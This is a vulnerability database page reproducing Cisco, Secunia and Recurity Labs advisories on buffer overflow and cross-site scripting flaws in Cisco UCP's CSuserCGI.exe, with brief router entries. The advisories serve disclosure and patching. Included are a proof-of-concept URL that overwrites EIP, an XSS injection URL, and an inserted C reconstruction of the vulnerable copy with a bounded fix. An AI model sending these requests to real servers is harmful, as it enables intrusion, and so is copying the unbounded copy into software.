VARIoT IoT vulnerabilities database


VAR-200803-0008 CVE-2007-6709 Cisco Linksys WAG54GS Wireless-G ADSL Gateway vulnerability allowing unauthorized access CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware has "admin" as its default password for the "admin" account, which makes it easier for remote attackers to obtain access. The Wireless-G ADSL Gateway WAG54GS is prone to a remote security vulnerability.
VAR-200803-0091 CVE-2008-1334 BT Home Hub router cgi/b arbitrary VoIP phone call vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
cgi/b on the BT Home Hub router allows remote attackers to bypass authentication, and read or modify administrative settings or make arbitrary VoIP telephone calls, by placing a character at the end of the PATH_INFO, as demonstrated by (1) %5C (encoded backslash), (2) '%' (percent), and (3) '~' (tilde). NOTE: the '/' (slash) vector is already covered by CVE-2007-5383. This issue may overlap with CVE-2007-5383. A third party who places a character at the end of PATH_INFO may bypass authentication, read or change administrative settings, or place arbitrary VoIP phone calls. Home Hub is prone to a security bypass vulnerability.
VAR-200803-0032 CVE-2008-0532 Multiple remote vulnerabilities in CSuserCGI.exe in Cisco User-Changeable Password (UCP) CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Multiple buffer overflows in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to execute arbitrary code via a long argument located immediately after the Logout argument, and possibly unspecified other vectors. Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities. Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. These issues affect versions prior to UCP 4.2 when running on Microsoft Windows.

----------------------------------------------------------------------
A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.

Download and test it today: https://psi.secunia.com/
Read more about this new version: https://psi.secunia.com/?page=changelog
----------------------------------------------------------------------

TITLE:
Cisco User-Changeable Password Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA29351

VERIFY ADVISORY:
http://secunia.com/advisories/29351/

CRITICAL:
Highly critical

IMPACT:
Cross Site Scripting, DoS, System access

WHERE:
From remote

SOFTWARE:
Cisco User-Changeable Password 4.x
http://secunia.com/product/17930/

DESCRIPTION:
Some vulnerabilities have been reported in Cisco User-Changeable Password (UCP), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially to compromise a vulnerable system.

1) Multiple boundary errors exist within the UCP CGI script ("CSuserCGI.exe") when processing the "Logout", "Main", and "ChangePass" arguments. These can be exploited to cause buffer overflows via overly long subsequent arguments.

NOTE: Other arguments may also be affected.

Successful exploitation may allow execution of arbitrary code.

2) Input passed via the "Help" parameter to the UCP CGI script ("CSuserCGI.exe") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml

Recurity Labs:
http://www.recurity-labs.com/content/pub/RecurityLabs_Cisco_ACS_UCP_advisory.txt

----------------------------------------------------------------------

About:
This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe:
http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Please Note:
Secunia recommends that you verify all advisories you receive by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use those supplied by the vendor.

The second set of vulnerabilities address cross-site scripting in the UCP application pages. Both sets of vulnerabilities could be remotely exploited, and do not require valid user credentials.

Cisco has released a free software update for UCP that addresses these vulnerabilities. There are no workarounds that mitigate these vulnerabilities.

UCP is not installed by default with ACS installations. Users can perform the following steps to determine the version of UCP installed on a system:

1. Log in to the system where UCP is installed
2. Open a Windows command prompt
3. Change the current working directory to the default directory of the CGI scripts that was specified during installation of UCP. The default installation directory is "C:\Inetpub\Wwwroot\securecgi-bin". Within this directory execute the command "CSuserCGI ver". The output returned will indicate a CSuserCGI version. Any version earlier than 4.2 is vulnerable.

The following example shows a system with UCP version 4.2 installed.

    C:\> c:
    C:\> cd c:\inetpub\Wwwroot\securecgi-bin
    C:\Inetpub\Wwwroot\securecgi-bin>CSuserCGI ver
    CSuserCGI 4.2, Copyright 2008 Cisco Systems Inc

Products Confirmed Not Vulnerable
+--------------------------------

Installations of Cisco Secure ACS for Windows or Cisco Secure ACS Solution Engine without UCP installed, are not vulnerable. Cisco Secure ACS for UNIX, does not support the UCP utility and is not vulnerable.

No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======

The UCP application enables end users to change their ACS passwords with a web-based utility. When users need to change their own passwords, they can access the UCP web page by using a supported web browser, validate their existing credentials, and then change their password via the utility.

For more information about the UCP application please see http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_server_for_windows/4.2/installation/guide/user_passwords/ucp.html.

Several vulnerabilities exist within the UCP application.

* Multiple Buffer Overflow Vulnerabilities.

Multiple buffer overflows exist within the UCP CSuserCGI.exe code. CSuserCGI.exe is the HTTP interface to the server.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss .

* CSCsl49180: Multiple Buffer Overflow Vulnerabilities.

CVSS Base Score - 10
  Access Vector: Network
  Access Complexity: Low
  Authentication: None
  Confidentiality Impact: Complete
  Integrity Impact: Complete
  Availability Impact: Complete

CVSS Temporal Score - 8.3
  Exploitability: Functional
  Remediation Level: Official-Fix
  Report Confidence: Confirmed

* CSCsl49205: Cross Site Scripting Vulnerabilities.

CVSS Base Score - 4.3
  Access Vector: Network
  Access Complexity: Medium
  Authentication: None
  Confidentiality Impact: None
  Integrity Impact: Partial
  Availability Impact: None

CVSS Temporal Score - 3.6
  Exploitability: Functional
  Remediation Level: Official-Fix
  Report Confidence: Confirmed

Impact
======

Successful exploitation of the buffer overflow vulnerabilities may result in the execution of arbitrary code on the system the UCP application is installed.

Successful exploitation of the cross-site scripting vulnerabilities may result in the embedding of malicious code and/or scripts within a UCP URL. The malicious code is likely to be a script that is embedded in the URL of a link. The malicious code may also be stored on the vulnerable server or a malicious website. An attacker could try to convince an unsuspecting user to follow a malicious link to a vulnerable UCP application server that injects (reflects) the malicious code back to the user's browser.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

UCP Version 4.2 contains the fixes for the listed vulnerabilities. UCP version 4.2 is not compatible with 3.x ACS installations. No fixed UCP version exists for 3.x ACS installations.

Workarounds
===========

There are no workarounds for these vulnerabilities. Cisco recommends upgrading to the fixed version of UCP.

For additional information on cross-site scripting attacks and the methods used to exploit these vulnerabilities, please refer to the Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting (XSS) Threat Vectors", which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml .

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

We would like to thank Felix 'FX' Lindner, Recurity Labs GmbH for reporting this issue to us. We greatly appreciate the opportunity to work with researchers on security vulnerabilities, and welcome the opportunity to review and assist with security vulnerability reports against Cisco products.

Status of this Notice: FINAL
======================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.
Revision History
================

+-----------------------------------------------------+
| Revision 1.0 | 2008-Mar-12 | Initial Public Release |
+-----------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

________________________________________________________________________

Recurity Labs GmbH
http://www.recurity-labs.com
entomology@recurity-labs.com

Date: 12.03.2008
________________________________________________________________________

Vendor: Cisco Systems
Product: Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application
Vulnerability: Multiple remote pre-authentication buffer overflows, Cross Site Scripting issue
Affected Releases: ACS 3 and 4, UCP v3.3.4.12.5, CSuserCGI 3.3.1
NOT Affected Releases: UCP 4.2 and above
Severity: HIGH
CVE: CVE-2008-0532, CVE-2008-0533
________________________________________________________________________

Vendor communication:

20.11.2007 Initial notification to PSIRT
20.11.2007 Response from PSIRT, PGP encrypted to PSIRT only
26.11.2007 Response from Paul Oxman / PSIRT
26.11.2007 Even more detailed information to Paul Oxman
27.11.2007 Received new PGP keys from PSIRT
27.11.2007 Retransmit
28.11.2007 Paul Oxman reports they are working on it
28.11.2007 Fix discussions with Paul Oxman
29.11.2007 Paul Oxman provides Cisco Bug IDs
29.11.2007 Fix discussions with Paul Oxman
12.12.2007 Fixed version provided for testing
13.12.2007 Feedback to the fixed code
14.12.2007 Paul Oxman acknowledges feedback
17.12.2007 Paul Oxman reports internal progress
17.12.2007 More feedback
08.01.2008 Paul Oxman reports internal progress
08.01.2008 ACK
30.01.2008 Paul Oxman proposes advisory release date
30.01.2008 Acknowledging advisory release date
27.02.2008 Paul Oxman updates on progress
27.02.2008 ACK
05.03.2008 Paul Oxman sends draft Cisco advisory
05.03.2008 Sending draft Recurity Labs advisory
06.03.2008 Paul Oxman provides fixed release version
06.03.2008 Final communication with Paul Oxman
12.03.2008 Coordinated release
________________________________________________________________________

Overview:

Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application is a set of CGI programs and web site contents installed on Microsoft IIS. Additionally, CSUserCGI.exe suffers from a non-persistent Cross Site Scripting vulnerability.

Description:

The main() function of CSuserCGI.exe compares the first command line argument passed to the program using strcmp() against a list of supported arguments, among them "Logout", "Main", "ChangePass", etc. For most of the arguments, it will simply parse the following arguments and pass them to a wsprintf() call with format strings like "Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of these calls is located in the .data segment of the application.

In case of the "Logout" argument, main() passes the second argument, usually of the form "1234.xyzab.c.username.", as well as a char[] buffer on the stack to a function that first extracts the string up to the first '.' character using strtok and then copies the string into the supplied char[] buffer. The char buffer is 96 bytes long. Accordingly, if the string before the first dot character exceeds this length, the buffer as well as the return address is overwritten.

    .text:00401065 mov eax, [ebx+8] ; get argv[2]
    .text:00401068 test eax, eax
    .text:0040106A jz loc_401520
    .text:00401070 push eax ; char *
    .text:00401071 call sub_402870
    ...
    .text:00402870 sub esp, 60h
    .text:00402873 mov ecx, 17h
    .text:00402878 xor eax, eax
    .text:0040287A push edi
    .text:0040287B lea edi, [esp+64h+var_60]
    .text:0040287F rep stosd
    .text:00402881 mov ecx, [esp+64h+arg_0]
    .text:00402885 stosw
    .text:00402887 stosb
    .text:00402888 lea eax, [esp+64h+var_60]
    .text:0040288C push eax ; int
    .text:0040288D push ecx ; char *
    .text:0040288E call sub_402940
    ...
    .text:00402940 mov ecx, [esp+arg_0]
    .text:00402944 xor eax, eax
    .text:00402946 test ecx, ecx
    .text:00402948 jz locret_402A11
    .text:0040294E push ebx
    .text:0040294F push esi
    .text:00402950 push edi
    .text:00402951 push offset a_ ; "."
    .text:00402956 push ecx ; char *
    .text:00402957 call _strtok
    .text:0040295C mov edi, eax
    .text:0040295E or ecx, 0FFFFFFFFh
    .text:00402961 xor eax, eax
    .text:00402963 mov ebx, [esp+14h+arg_4]
    .text:00402967 repne scasb
    .text:00402969 not ecx
    .text:0040296B sub edi, ecx
    .text:0040296D lea edx, [ebx+1]
    .text:00402970 mov eax, ecx
    .text:00402972 mov esi, edi
    .text:00402974 mov edi, edx
    .text:00402976 push offset a_ ; "."
    .text:0040297B shr ecx, 2
    .text:0040297E rep movsd
    .text:00402980 mov ecx, eax
    .text:00402982 push 0 ; char *
    .text:00402984 and ecx, 3
    .text:00402987 rep movsb

Example:

The following request will cause EIP to be overwritten with 0x42424242. The line may wrap, depending on how you view this file.

https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.

A non-persistent Cross Site Scripting vulnerability can also be triggered using the Help facility of the CGI. An example request would be as follows. The line may wrap, depending on how you view this file.

https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E

Solution:

Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed software: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml
________________________________________________________________________

Credit:

The vulnerabilities were identified by Felix 'FX' Lindner, Recurity Labs GmbH, during a cursory inspection of a customer installation of the ACS UCP product.

Greets to the teams at Recurity Labs and Zynamics, Sergio Alvarez, Max Moser, Alexander Kornbrust, Maxim Salomon, Nicolas Fischbach, Karsten Schumann, Frank Becker, PSIRT, Paul Oxman, John Stewart
________________________________________________________________________

The information provided is released "as is" without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2008 Recurity Labs GmbH and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
________________________________________________________________________
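The Logout defect described in the Recurity Labs advisory above (the text before the first '.' of the second argument is cut out with strtok and copied into a 96-byte stack buffer with no length check) as an added example that is neither Cisco's nor Recurity Labs' code: a hypothetical reconstruction of the defective pattern next to a bounded replacement that rejects empty, missing or over-long tokens instead of copying them. The function names, the SESSION_BUF_LEN constant and the sample arguments are assumptions constructed for this demo.

```c
#include <stdio.h>
#include <string.h>

/* Size of the fixed stack buffer the advisory describes (96 bytes). */
#define SESSION_BUF_LEN 96

/*
 * Hypothetical reconstruction (not Cisco's source) of the pattern the
 * disassembly shows: strtok() cuts the argument at the first '.', then the
 * token is copied into a fixed-size buffer with no check on its length.
 * strtok() also writes a NUL into the caller's argument.  A token longer
 * than SESSION_BUF_LEN - 1 overruns 'out' and the saved return address.
 */
static void copy_session_vulnerable(char *arg, char out[SESSION_BUF_LEN]) {
    char *tok = strtok(arg, ".");
    if (tok == NULL) {
        out[0] = '\0';
        return;
    }
    strcpy(out, tok);   /* unbounded copy: the defect */
}

/*
 * Bounded replacement: the caller passes the destination size, the input is
 * read-only (no strtok side effect), and a token that is empty, absent or too
 * long for the buffer is rejected rather than copied.
 * Returns the token length on success, -1 on rejection.
 */
static int copy_session_hardened(const char *arg, char *out, size_t out_len) {
    if (arg == NULL || out == NULL || out_len == 0) {
        return -1;
    }
    const char *dot = strchr(arg, '.');
    size_t n = dot != NULL ? (size_t)(dot - arg) : strlen(arg);
    if (n == 0 || n >= out_len) {  /* '>=' keeps room for the terminator */
        out[0] = '\0';
        return -1;
    }
    memcpy(out, arg, n);
    out[n] = '\0';
    return (int)n;
}

/* Demo helpers: run the hardened copy into a 96-byte buffer. */
static char g_last_prefix[SESSION_BUF_LEN];

static int hardened_into_96(const char *arg) {
    return copy_session_hardened(arg, g_last_prefix, sizeof g_last_prefix);
}

/*
 * Constructed argument (not the request from the advisory): 'n' copies of
 * 'A' followed by ".xyzab.c.user.".  Returns the hardened result so the
 * boundary (95 accepted, 96 rejected) can be checked.
 */
static int overlong_result(size_t n) {
    char arg[512];
    if (n > sizeof arg - 32) {
        return -2;  /* demo limit on the constructed input, not a security check */
    }
    memset(arg, 'A', n);
    strcpy(arg + n, ".xyzab.c.user.");
    return hardened_into_96(arg);
}

int main(void) {
    char sample[] = "1234.xyzab.c.username.";   /* constructed, well-formed */
    char out[SESSION_BUF_LEN];

    /* Short input is safe for the vulnerable version; note strtok truncated it. */
    copy_session_vulnerable(sample, out);
    printf("vulnerable copy: \"%s\" (argument now \"%s\")\n", out, sample);

    printf("hardened, short id : %d \"%s\"\n",
           hardened_into_96("1234.xyzab.c.username."), g_last_prefix);
    printf("hardened, 95 x 'A' : %d (fits)\n", overlong_result(95));
    printf("hardened, 96 x 'A' : %d (rejected)\n", overlong_result(96));
    printf("hardened, no dot   : %d\n", hardened_into_96("nodot"));
    return 0;
}
```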
VAR-200803-0033 CVE-2008-0533 Multiple remote vulnerabilities in CSuserCGI.exe in Cisco User-Changeable Password (UCP) CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. There may also be other unknown vectors. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Cisco User-Changeable Password Multiple Vulnerabilities SECUNIA ADVISORY ID: SA29351 VERIFY ADVISORY: http://secunia.com/advisories/29351/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, DoS, System access WHERE: >From remote SOFTWARE: Cisco User-Changeable Password 4.x http://secunia.com/product/17930/ DESCRIPTION: Some vulnerabilities have been reported in Cisco User-Changeable Password (UCP), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially to compromise a vulnerable system. 
1) Multiple boundary errors exist within the UCP CGI script ("CSuserGCI.exe") when processing the "Logout", "Main", and "ChangePass" arguments. These can be exploited to cause buffer overflows via overly long subsequent arguments. NOTE: Other arguments may also be affected. Successful exploitation may allow execution of arbitrary code. 2) Input passed via the "Help" parameter to the UCP CGI script ("CSuserCGI.exe") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml Recurity Labs: http://www.recurity-labs.com/content/pub/RecurityLabs_Cisco_ACS_UCP_advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The second set of vulnerabilities address cross-site scripting in the UCP application pages. Both sets of vulnerabilities could be remotely exploited, and do not require valid user credentials. Cisco has released a free software update for UCP that addresses these vulnerabilities. There are no workarounds that mitigate these vulnerabilities. UCP is not installed by default with ACS installations. Users can perform the following steps to determine the version of UCP installed on a system: 1. Log in to the system where UCP is installed 2. Open a Windows command prompt 3. 
Change the current working directory to the default directory of the CGI scripts that was specified during installation of UCP. The default installation directory is "C:\Inetpub\Wwwroot\securecgi-bin". Within this directory execute the command "CSuserCGI ver". The output returned will indicate a CSuserCGI version. Any version earlier than 4.2 is vulnerable. The following example shows a system with UCP version 4.2 installed. C:\> c: C:\> cd c:\inetpub\Wwwroot\securecgi-bin C:\Inetpub\Wwwroot\securecgi-bin>CSuserCGI ver CSuserCGI 4.2, Copyright 2008 Cisco Systems Inc Products Confirmed Not Vulnerable +-------------------------------- Installations of Cisco Secure ACS for Windows or Cisco Secure ACS Solution Engine without UCP installed, are not vulnerable. Cisco Secure ACS for UNIX, does not support the UCP utility and is not vulnerable. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The UCP application enables end users to change their ACS passwords with a web-based utility. When users need to change their own passwords, they can access the UCP web page by using a supported web browser, validate their existing credentials, and then change their password via the utility. For more information about the UCP application please see http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_server_for_windows/4.2/installation/guide/user_passwords/ucp.html. Several vulnerabilities exist within the UCP application. * Multiple Buffer Overflow Vulnerabilities. Multiple buffer overflows exist within the UCP CSuserCGI.exe code. CSuserGCI.exe is the HTTP interface to the server. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. 
CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss . * CSCsl49180: Multiple Buffer Overflow Vulnerabilities. CVSS Base Score - 10 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete CVSS Temporal Score - 8.3 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed * CSCsl49205: Cross Site Scripting Vulnerabilities. CVSS Base Score - 4.3 Access Vector: Network Access Complexity: Medium Authentication: None Confidentiality Impact: None Integrity Impact: Partial Availability Impact: None CVSS Temporal Score - 3.6 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed Impact ====== Successful exploitation of the buffer overflow vulnerabilities may result in the execution of arbitrary code on the system the UCP application is installed. Successful exploitation of the cross-site scripting vulnerabilities may result in the embedding of malicious code and/or scripts within a UCP URL. The malicious code is likely to be a script that is embedded in the URL of a link. The malicious code may also be stored on the vulnerable server or a malicious website. An attacker could try to convince an unsuspecting user to follow a malicious link to a vulnerable UCP application server that injects (reflects) the malicious code back to the user's browser. 
Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. UCP Version 4.2 contains the fixes for the listed vulnerabilities. UCP version 4.2 is not compatible with 3.x ACS installations. No fixed UCP version exists for 3.x ACS installations. Workarounds =========== There are no workarounds for these vulnerabilities. Cisco recommends upgrading to the fixed version of UCP. For additional information on cross-site scripting attacks and the methods used to exploit these vulnerabilities, please refer to the Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting (XSS) Threat Vectors", which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. 
By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml .

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC).
TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

We would like to thank Felix 'FX' Lindner, Recurity Labs GmbH for reporting this issue to us. We greatly appreciate the opportunity to work with researchers on security vulnerabilities, and welcome the opportunity to review and assist with security vulnerability reports against Cisco products.

Status of this Notice: FINAL
======================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.
Distribution
============

This advisory is posted on Cisco's worldwide website at:
